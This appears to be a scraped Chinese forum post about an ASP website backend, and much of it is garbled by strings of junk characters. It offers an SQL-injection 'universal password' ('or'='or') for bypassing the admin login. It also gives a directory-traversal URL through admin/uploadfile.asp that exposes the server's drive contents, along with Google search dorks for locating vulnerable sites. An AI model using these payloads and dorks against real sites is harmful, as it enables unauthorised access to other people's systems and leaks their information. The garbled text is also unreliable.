后台万能密码 'or'='or'
5 b/ Z' s5 X* O0 T8 h
9 z4 e' Z8 @% k' Z2 f" J后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
" y+ I4 D H( P8 [admin/uploadfile.asp?currentFolder=/upfiles/../
, v) I( k# j' `: S1 o. e& Q
% @/ b/ i- D% A4 {; ?! a漏洞证明:0 Q4 c, g5 \6 g
) W* I! A2 {8 M
谷歌:inurl:type.asp?id=1 新闻中心- ]9 D) b* C& C1 M) \: s/ t8 b9 D
或者 :inurl:download_ok.asp?
) m* D" ?* R2 q7 H h- {6 W& c: I* ?$ B0 R1 E0 ^0 X: _
|